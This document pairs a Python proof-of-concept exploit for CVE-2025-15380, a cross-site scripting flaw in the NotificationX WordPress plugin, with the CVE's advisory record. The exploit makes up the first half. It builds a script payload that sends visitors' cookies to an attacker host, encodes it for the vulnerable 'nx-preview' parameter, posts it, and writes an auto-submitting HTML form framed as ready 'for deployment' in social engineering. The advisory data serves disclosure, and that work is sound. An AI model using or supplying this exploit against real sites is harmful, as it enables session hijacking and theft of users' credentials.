CVE-2025-15380

import requests import base64 # CVE-2025-15380 PoC - NotificationX DOM-based XSS # Target URL with vulnerable NotificationX plugin target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Malicious JavaScript payload malicious_script = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>" # Encode the payload for nx-preview parameter encoded_payload = base64.b64encode(malicious_script.encode()).decode() # Prepare the exploit request data = { 'action': 'notificationx_preview', 'nx-preview': encoded_payload, 'nonce': 'attacker_controlled' # May not be required for all configurations } # Alternative: Direct injection without encoding direct_payload = malicious_script # Auto-submit form HTML for social engineering html_form = f''' <html> <body> <form id="exploitForm" action="{target_url}" method="POST"> <input type="hidden" name="action" value="notificationx_preview"> <input type="hidden" name="nx-preview" value="{direct_payload}"> </form> <script> // Auto-submit form when page loads document.getElementById('exploitForm').submit(); </script> </body> </html> ''' # Send the exploit request response = requests.post(target_url, data=data, allow_redirects=False) print(f"Status: {{response.status_code}}") print(f"Response: {{response.text[:500]}}") # Save the HTML form for deployment with open('exploit.html', 'w') as f: f.write(html_form) print("Exploit HTML saved to exploit.html")

{"cve": {"id": "CVE-2025-15380", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:15.767", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the 'nx-preview' POST parameter in all versions up to, and including, 3.2.0. This is due to insufficient input sanitization and output escaping when processing preview data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user visits a malicious page that auto-submits a form to the vulnerable site."}, {"lang": "es", "value": "El plugin NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner &amp; Floating Notification Bar para WordPress es vulnerable a cross-site scripting basado en DOM a través del parámetro POST 'nx-preview' en todas las versiones hasta e incluyendo la 3.2.0. Esto se debe a una insuficiente sanitización de entrada y escape de salida al procesar datos de vista previa. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan cuando un usuario visita una página maliciosa que envía automáticamente un formulario al sitio vulnerable."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-15380/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ca12315-380b-4251-b637-4e9d29df35e0?source=cve", "source": "[email protected]"}]}}